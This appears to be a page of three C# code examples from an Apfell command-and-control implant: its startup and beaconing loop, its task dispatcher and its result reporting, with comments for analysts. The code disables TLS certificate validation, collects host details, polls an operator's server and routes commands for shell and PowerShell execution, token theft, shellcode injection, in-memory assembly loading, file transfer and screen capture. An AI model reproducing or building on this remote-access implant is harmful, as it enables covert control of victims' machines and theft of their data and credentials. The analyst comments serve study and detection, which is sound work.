Пример #1
        /// <summary>
        /// Reports this task's outcome through <paramref name="implant"/> and then removes the
        /// task's entry from the implant's job list.
        /// </summary>
        /// <param name="implant">Implant object whose reporting methods and job list are used.</param>
        /// <remarks>
        /// Only the "error" status and the "complete" status (for commands other than "download"
        /// and "screencapture") produce a report here; any other status sends nothing.
        /// </remarks>
        private void SendResult(SCImplant implant)
        {
            if (this.status == "error")
            {
                implant.SendError(this.id, this.message);
            }
            else if (this.status == "complete" &&
                     !(this.command == "download" || this.command == "screencapture"))
            {
                // "download" and "screencapture" are skipped; presumably those handlers
                // report their own output -- not visible in this method.
                implant.PostResponse(new SCTaskResp(this.id, this.message));
                implant.SendComplete(this.id);
            }

            try
            {
                // Forward scan that keeps advancing after a removal, so the entry that
                // slides into the freed slot is not examined on this pass.
                int index = 0;
                while (index < implant.jobs.Count)
                {
                    if (implant.jobs[index].shortId == this.shortId)
                    {
                        implant.jobs.RemoveAt(index);
                    }

                    index++;
                }
            }
            catch (Exception ex)
            {
                // The original author expected this only during testing. No lock is taken
                // around implant.jobs here, so the failure is logged and otherwise ignored.
                Debug.WriteLine($"[!] Caught exception: {ex.Message}");
            }
        }
Пример #2
        /// <summary>
        /// Entry point: fills in the implant's host profile, calls InitializeImplant, and on
        /// success polls for tasking forever, running each received task on its own thread.
        /// </summary>
        /// <param name="args">
        /// args[0] is the server base URL, args[1] the Base64-encoded pre-shared key and
        /// args[2] the payload UUID. All three are indexed without a length check.
        /// </param>
        /// <remarks>
        /// Notes for analysts: the server URL, key and UUID arrive as command-line arguments,
        /// so they appear in process-creation logging that records command lines. Requests go
        /// to the base URL with "/api/v1.3/" appended, and check-ins are separated by a fixed
        /// Thread.Sleep(implant.sleep) interval.
        /// </remarks>
        static void Main(string[] args)
        {
            // Accept every server certificate: the callback returns true unconditionally and
            // ServicePointManager applies it process-wide, so TLS gives no server authentication.
            ServicePointManager.ServerCertificateValidationCallback =
                (sender, certificate, chain, sslPolicyErrors) => true;

            SCImplant implant = new SCImplant
            {
                // Generated when payload is created in Apfell
                uuid = args[2],
                endpoint = args[0] + "/api/v1.3/",
                host = Dns.GetHostName(),
                // The host may have more than one interface, so the first IPv4 address is
                // picked. FirstOrDefault yields null when there is none and ToString() then throws.
                ip = Dns.GetHostEntry(Dns.GetHostName())
                    .AddressList
                    .FirstOrDefault(addr => addr.AddressFamily == AddressFamily.InterNetwork)
                    .ToString(),
                domain = Environment.UserDomainName,
                os = Environment.OSVersion.VersionString,
                // Hard-coded; not derived from the running process.
                architecture = "x64",
                pid = Process.GetCurrentProcess().Id,
                // Milliseconds: passed straight to Thread.Sleep below.
                sleep = 5000,
                user = Environment.UserName
            };
            HTTP.crypto.PSK = Convert.FromBase64String(args[1]);

            if (!implant.InitializeImplant())
            {
                return;
            }

            int nextShortId = 1;
            while (true)
            {
                SCTask task = implant.CheckTasking();
                if (task.command != "none")
                {
                    task.shortId = nextShortId++;

                    // The task starts running before its job entry is added below.
                    Thread worker = new Thread(() => task.DispatchTask(implant));
                    worker.Start();

                    // Original intent: keep the job-tracking commands out of the job list.
                    // NOTE(review): as written with "||" this condition is always true, so
                    // every task, including "jobs" and "jobkill", is recorded.
                    if (task.command != "jobs" || task.command != "jobkill")
                    {
                        string description = task.command;
                        if (task.@params != "")
                        {
                            description += " " + task.@params;
                        }

                        Job job = new Job
                        {
                            shortId = task.shortId,
                            task = description,
                            thread = worker
                        };

                        implant.jobs.Add(job);
                    }
                }

                Thread.Sleep(implant.sleep);
            }
        }
Пример #3
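        /// <summary>
        /// Routes this task to the handler matching its <c>command</c> string, then reports the
        /// outcome through <c>SendResult</c>.
        /// </summary>
        /// <param name="implant">The SCImplant we're handling a task for.</param>
        /// <remarks>
        /// Command strings are compared literally. A command that matches no case runs no
        /// handler but still reaches <c>SendResult</c>. Judging by the handler names and debug
        /// strings, the verbs cover file transfer, directory and process listing, process and
        /// PowerShell execution, token handling, in-memory assembly and shellcode execution,
        /// and screen capture; the handlers themselves are not visible here.
        /// </remarks>
        public void DispatchTask(SCImplant implant)
        {
            switch (this.command)
            {
                case "cd":
                    Debug.WriteLine("[-] DispatchTask - Tasked to change directory " + this.@params);
                    ChangeDir.Execute(this);
                    break;

                case "download":
                    Debug.WriteLine("[-] DispatchTask - Tasked to send file " + this.@params);
                    Download.Execute(this, implant);
                    break;

                case "execute_assembly":
                    Debug.WriteLine("[-] DispatchTask - Tasked to execute assembly " + this.@params);
                    Tasks.ExecAssembly.Execute(this, implant);
                    break;

                case "exit":
                    Debug.WriteLine("[-] DispatchTask - Tasked to exit");
                    Exit.Execute(this, implant);
                    break;

                // "jobs" and "jobkill" share one handler.
                case "jobs":
                    Debug.WriteLine("[-] DispatchTask - Tasked to list jobs");
                    Jobs.Execute(this, implant);
                    break;

                case "jobkill":
                    Debug.WriteLine($"[-] DispatchTask - Tasked to kill job {this.@params}");
                    Jobs.Execute(this, implant);
                    break;

                case "kill":
                    Debug.WriteLine("[-] DispatchTask - Tasked to kill PID " + this.@params);
                    Kill.Execute(this);
                    break;

                case "ls":
                    Debug.WriteLine("[-] DispatchTask - Tasked to list directory " + this.@params);
                    DirectoryList.Execute(this, implant);
                    break;

                // "make_token" and "steal_token" both go to Token.Execute.
                case "make_token":
                    // Only the first space-separated field of the parameters is logged.
                    // This expression was mangled by the page's e-mail obfuscation and is restored here.
                    Debug.WriteLine("[-] DispatchTask - Tasked to make a token for " + this.@params.Split(' ')[0]);
                    Token.Execute(this);
                    break;

                case "ps":
                    Debug.WriteLine("[-] DispatchTask - Tasked to list processes");
                    ProcessList.Execute(this);
                    break;

                case "powershell":
                    Debug.WriteLine("[-] DispatchTask - Tasked to run powershell");
                    Powershell.Execute(this);
                    break;

                case "rev2self":
                    Debug.WriteLine("[-] DispatchTask - Tasked to revert token");
                    Token.Revert(this);
                    break;

                // "run" and "shell" share one handler.
                case "run":
                    Debug.WriteLine("[-] DispatchTask - Tasked to start process");
                    Proc.Execute(this, implant);
                    break;

                case "screencapture":
                    Debug.WriteLine("[-] DispatchTask - Tasked to take screenshot.");
                    ScreenCapture.Execute(this, implant);
                    break;

                case "shell":
                    Debug.WriteLine("[-] DispatchTask - Tasked to run shell command.");
                    Proc.Execute(this, implant);
                    break;

                case "shinject":
                    Debug.WriteLine("[-] DispatchTask - Tasked to run shellcode.");
                    Shellcode.Execute(this);
                    break;

                case "sleep":
                    // Handled inline: the parameter is parsed as an integer and stored
                    // multiplied by 1000 in implant.sleep.
                    try
                    {
                        int seconds = Convert.ToInt32(this.@params);
                        Debug.WriteLine("[-] DispatchTask - Tasked to change sleep to: " + seconds);
                        implant.sleep = seconds * 1000;
                        this.status   = "complete";
                    }
                    catch
                    {
                        // Any failure in the block above is reported as a bad-integer error.
                        Debug.WriteLine("[-] DispatchTask - ERROR sleep value provided was not int");
                        this.status  = "error";
                        this.message = "Please provide an integer value";
                    }
                    break;

                case "spawn":
                    Debug.WriteLine("[-] DispatchTask - Tasked to spawn");
                    Spawn.Execute(this);
                    break;

                case "steal_token":
                    Debug.WriteLine("[-] DispatchTask - Tasked to steal token");
                    Token.Execute(this);
                    break;

                case "upload":
                    Debug.WriteLine("[-] DispatchTask - Tasked to get file from server");
                    Upload.Execute(this, implant);
                    break;
            }

            this.SendResult(implant);
        }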